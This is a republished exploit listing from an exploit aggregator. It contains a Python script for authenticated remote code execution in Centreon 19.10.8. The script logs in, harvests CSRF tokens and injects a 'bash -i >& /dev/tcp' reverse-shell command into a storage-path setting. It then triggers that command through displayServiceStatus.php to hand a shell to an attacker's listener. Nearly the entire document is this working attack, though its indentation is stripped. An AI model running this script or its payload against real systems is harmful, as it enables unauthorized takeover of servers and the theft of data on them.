Exploit for Centreo 19.10.8 Remote Code Execution

Name: Exploit for Centreo 19.10.8 Remote Code Execution
Rating: 5 (141 reviews)
2020-03-26 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:156911
# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution  
# Date: 2020-03-25  
# Exploit Author: Engin Demirbilek  
# Vendor Homepage: https://www.centreon.com/  
# Version: 19.10.8  
# Tested on: CentOS  
# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce  
# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607   
  
#!/usr/bin/python  
  
import requests  
import sys  
import warnings  
from bs4 import BeautifulSoup  
  
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')  
  
if len(sys.argv) < 6:  
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"  
exit()  
  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
ip = sys.argv[4]  
port = sys.argv[5]  
  
  
req = requests.session()  
print("[+] Retrieving CSRF token...")  
loginPage = req.get(url+"/index.php")  
response = loginPage.text  
s = BeautifulSoup(response, 'html.parser')  
centreon_token = s.find('input', {'name':'centreon_token'})['value']  
  
login_creds = {  
"useralias": username,  
"password": password,  
"submitLogin": "Connect",  
"centreon_token": centreon_token  
}  
  
  
print("[+] Sendin login request...")  
login = req.post(url+"/index.php", login_creds)  
  
if "incorrect" not in login.text:  
print("[+] Logged In, retrieving second token")  
  
page = url + "/main.get.php?p=50118"  
second_token_req = req.get(page)  
response = second_token_req.text  
s = BeautifulSoup(response, 'html.parser')  
second_token = s.find('input', {'name':'centreon_token'})['value']  
  
payload = {  
"RRDdatabase_path": "/var/lib/centreon/metrics/",  
"RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),  
"RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",  
"reporting_retention": "365",  
"archive_retention": "31",  
"len_storage_mysql": "365",  
"len_storage_rrd": "180",  
"len_storage_downtimes": "0",  
"len_storage_comments": "0",  
"partitioning_retention": "365",  
"partitioning_retention_forward": "10",  
"cpartitioning_backup_directory": "/var/cache/centreon/backup",  
"audit_log_option": "1",  
"audit_log_retention": "0",  
"submitC": "Save",  
"gopt_id": "",  
"o": "storage",  
"o": "storage",  
"centreon_token": second_token,  
  
  
}  
print("[+] Sendin payload...")  
send_payload = req.post(page, payload)  
  
trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"  
print("[+] Triggerring payload...")  
trigger = req.get(trigger_url)  
  
print("[+] Check your listener !...")  
  
else:  
print("[-] Wrong credentials")  
exit()